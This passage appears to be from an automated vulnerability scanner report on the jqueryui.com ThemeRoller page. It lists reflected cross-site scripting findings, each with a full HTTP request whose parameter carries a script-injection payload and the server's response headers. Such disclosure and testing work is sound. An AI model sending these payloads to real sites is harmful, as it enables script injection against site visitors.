GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em2d06c"><script>alert(1)</script>c2aa43a121c&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973a4"><script>alert(1)</script>cb8eec49bfe was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold973a4"><script>alert(1)</script>cb8eec49bfe&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120111
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae84d"><script>alert(1)</script>80ac578362b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01ae84d"><script>alert(1)</script>80ac578362b&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ef9"><script>alert(1)</script>f2451ef5de1 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bddc5ef9"><script>alert(1)</script>f2451ef5de1&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8451"><script>alert(1)</script>ff0e6439862 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5e8451"><script>alert(1)</script>ff0e6439862&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ad"><script>alert(1)</script>d64a7ef281d was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a880ad"><script>alert(1)</script>d64a7ef281d&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b3d2"><script>alert(1)</script>bf07ccca7fe was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f31b3d2"><script>alert(1)</script>bf07ccca7fe&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d4a"><script>alert(1)</script>7cbe5359106 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff87d4a"><script>alert(1)</script>7cbe5359106&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c5a"><script>alert(1)</script>e6d1361b6b7 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI ...[SNIP]...
4.84. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2f3"><script>alert(1)</script>b0d24937c9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?fa2f3"><script>alert(1)</script>b0d24937c9e=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:24:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ca4"><script>alert(1)</script>ef8babd57d1 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px31ca4"><script>alert(1)</script>ef8babd57d1&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2a1"><script>alert(1)</script>f8e2e66cbd8 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px4a2a1"><script>alert(1)</script>f8e2e66cbd8&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b66d"><script>alert(1)</script>623c2b48503 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305b66d"><script>alert(1)</script>623c2b48503&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
